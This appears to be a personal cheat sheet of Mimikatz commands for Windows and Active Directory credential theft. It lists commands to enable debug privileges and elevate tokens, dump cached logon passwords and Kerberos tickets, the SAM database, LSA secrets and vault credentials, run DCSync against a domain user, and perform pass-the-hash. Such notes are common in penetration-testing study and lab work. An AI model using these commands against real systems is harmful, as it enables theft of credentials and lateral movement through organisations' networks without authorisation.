Use "privilege::debug" and "token::elevate" before dumping things!!!!
Dumping cached AD credentials -
sekurlsa::logonpasswords and sekurlsa::tickets
sekurlsa::logonpasswords
sekurlsa::tickets
Dumping local credentials -
lsadump::sam and lsadump::secrets
lsadump::sam
lsadump::secrets
Dumping vault creds -
vault::cred
Dumping creds via DCSync -
lsadump::dcsync /user:<domain>\<user> #Provide "corp" in domain if its "corp.com"
lsadump::dcsync /user:<domain>\<user>
Pass the Hash attack -
sekurlsa::pth #Check notion for whole command
sekurlsa::pth
Last updated 2 years ago